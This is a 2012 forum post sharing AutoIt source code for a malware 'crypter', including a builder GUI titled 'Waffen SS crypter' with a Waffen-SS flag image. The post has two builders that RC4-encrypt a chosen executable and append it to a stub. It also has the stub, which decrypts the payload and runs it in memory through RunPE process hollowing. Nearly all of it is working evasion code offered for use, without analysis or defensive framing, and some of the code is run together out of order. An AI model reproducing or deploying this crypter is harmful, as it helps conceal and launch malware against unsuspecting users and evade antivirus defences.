Expermicid Posted May 31, 2012 Share Posted May 31, 2012 (edited) Cliente: [lenguaje=autoit] ;Créditos: A.D.I Fênix ;http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445 ; #include #include #include #include #include #Region ### START Koda GUI section ### Form=c:\documents and settings\eu\meus documentos\form1.kxf $Form1_1 = GUICreate("Waffen SS crypter by Rudeb0y777 ", 709, 381, 209, 113) $Button1 = GUICtrlCreateButton("Abrir", 104, 160, 139, 65) GUICtrlSetFont(-1, 12, 800, 0, "Algerian") GUICtrlSetColor(-1, 0x0000FF) GUICtrlSetBkColor(-1, 0xD4D0C8) $Button2 = GUICtrlCreateButton("Encriptar", 368, 160, 147, 65) GUICtrlSetFont(-1, 12, 800, 0, "Algerian") GUICtrlSetColor(-1, 0x0000FF) GUICtrlSetBkColor(-1, 0xD4D0C8) $Input1 = GUICtrlCreateInput("Arquivo...", 120, 112, 401, 21) $Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Eu\Meus documentos\Meus documentos\Downloads\fotos variadas\waffen-ss-flag2.JPG", 0, 0, 705, 377, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS)) SoundPlay(@WindowsDir & "nova pasta\teste.mp3", 1) SoundSetWaveVolume(100) GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Form1_1 Case $Button1 GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)")) Case $Button2 if GuiCtrlRead($Input1) = "" then return $stub = FileOpen(@ScriptDir & "\stub.exe" , 16) $arquivo2 = FileOpen(GuiCtrlRead($Input1), 16) $st = FileRead($stub) $ar = FileRead($arquivo2) $ar = _RC4($ar,"LOLxD") Func _RC4($DATA, $KEY) Local $OPCODE = 
"0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000" Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]") DllStructSetData($CODEBUFFER, 1, $OPCODE) Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]") DllStructSetData($BUFFER, 1, $DATA) DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0) Local $RET = DllStructGetData($BUFFER, 1) $BUFFER = 0 $CODEBUFFER = 0 Return $RET EndFunc $salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18) FileWrite($salvar, $st) FileWrite($salvar, StringToBinary("rud777")) FileWrite($salvar, $ar) FileClose($stub) FileClose($Input1) FileClose($Salvar) MsgBox(64, "Encriptado!!!", "By Rud3b0y777") EndSwitch WEnd [/lenguaje] Otro Cliente: [lenguaje=autoit] ;Créditos: A.D.I Fênix ;http://www.orkut.com.br/Main#Community?cmm=25309445 ; #Include #Include #Include #Include #Include #Include #Region ### START Koda GUI section ### Form= Opt("GuiOnEventMode",1) $a = GUICreate(" Crypter ! 
Autoit*-*", 378, 406, 192, 124) GUISetIcon("C:\Documents and Settings\Gilmar\Desktop\projeto novo\icone.ico") GUISetBkColor(0x000000) $Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Gilmar\Desktop\Autoit\foto.jpg", 0, 0, 377, 345) $Abrir = GUICtrlCreateButton("Abrir", 208, 376, 73, 25, $WS_GROUP) $Cryptar = GUICtrlCreateButton("Cryptar", 296, 376, 73, 25, $WS_GROUP) $Arquivo = GUICtrlCreateInput("Arquivo", 0, 352, 377, 21) GUISetOnEvent($Gui_Event_Close, "sr") GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### GUICtrlSetOnEvent($Abrir, "abrir") GUICtrlSetOnEvent($Cryptar, "Cs") Func abrir() GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)")) EndFunc Func Cs() if GuiCtrlRead($Arquivo) = "" then return $stub = FileOpen(@ScriptDir & "\Stub.exe" , 16) $arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16) $st = FileRead($stub) $ar = FileRead($arquivo2) $ar = _RC4($ar, "Key") $salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18) FileWrite($salvar, $st) FileWrite($salvar, StringToBinary("Separador")) FileWrite($salvar, $ar) FileClose($stub) FileClose($Arquivo) FileClose($Salvar) MsgBox(64, " Crypter !", "Encryptado com sucesso !") EndFunc Func sr() Exit EndFunc While 1 Sleep(1) WEnd [/lenguaje] Stub: [lenguaje=autoit] ;Créditos: A.D.I Fênix ;http://www.orkut.com.br/Main#Community?cmm=25309445 ; #NoTrayIcon ; $FileStub = Sleep(150) $file = FileOpen(@ScriptFullPath, 0) $Data = FileRead($file) $Data = StringMid($Data, StringInstr($Data, "separador") + StringLen ("separador")) $Data = _RC4($Data, "key") _RunPE($Data) Func _RC4($DATA, $KEY) Local $OPCODE = 
"0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000" Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]") DllStructSetData($CODEBUFFER, 1, $OPCODE) Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]") DllStructSetData($BUFFER, 1, $DATA) DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0) Local $RET = DllStructGetData($BUFFER, 1) $BUFFER = 0 $CODEBUFFER = 0 Return $RET EndFunc Func _RunPE($BBINARYIMAGE) #region 1. PREPROCESSING PASSED Local $BBINARY = Binary($BBINARYIMAGE) Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]") DllStructSetData($TBINARY, 1, $BBINARY) Local $PPOINTER = DllStructGetPtr($TBINARY) #region 2. 
CREATING NEW PROCESS Local $TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError") Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId") Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION)) If @error Or Not $ACALL[0] Then Return SetError(1, 0, 0) EndIf Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process") Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread") #region 3. FILL CONTEXT STRUCTURE Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS") DllStructSetData($TCONTEXT, "ContextFlags", 65538) $ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT)) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(2, 0, 0) EndIf #region 4. 
READ PE-FORMAT Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER) $PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader") Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic") If Not ($SMAGIC == "MZ") Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(3, 0, 0) EndIf Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER) $PPOINTER += 4 If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(4, 0, 0) EndIf Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER) Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections") $PPOINTER += 20 Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword 
SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER) $PPOINTER += 96 Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic") If $IMAGIC <> 267 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(5, 0, 0) EndIf Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") $PPOINTER += 128 Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase") Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage") #region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED $ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW) If @error Or $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(6, 0, 0) EndIf #region 6. ALLOCATE 'NEW' MEMORY SPACE $ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(7, 0, 0) EndIf Local $PREMOTECODE = $ACALL[0] #region 7. 
GET AND WRITE NEW PE-HEADERS Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER) Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") $ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(8, 0, 0) EndIf #region 8. WRITE SECTIONS Local $TIMAGE_SECTION_HEADER Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA Local $IVIRTUALADDRESS For $I = 1 To $INUMBEROFSECTIONS $TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER) $ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData") $PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData") $IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress") If $ISIZEOFRAWDATA Then $ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(9, $I, 0) EndIf EndIf $PPOINTER += 40 Next #region 9. NEW ENTRY POINT DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW) #region 10. 
SET NEW CONTEXT $ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT)) If @error Or Not $ACALL[0] Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(10, 0, 0) EndIf #region 11. RESUME THREAD $ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD) If @error Or $ACALL[0] = -1 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0) Return SetError(11, 0, 0) EndIf #region 12. RETURN SUCCESS Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId") EndFunc ;Créditos: A.D.I Fênix [/lenguaje] Fuente: C-51 Saludos Edited February 16, 2014 by Expermicid Link to comment Share on other sites More sharing options...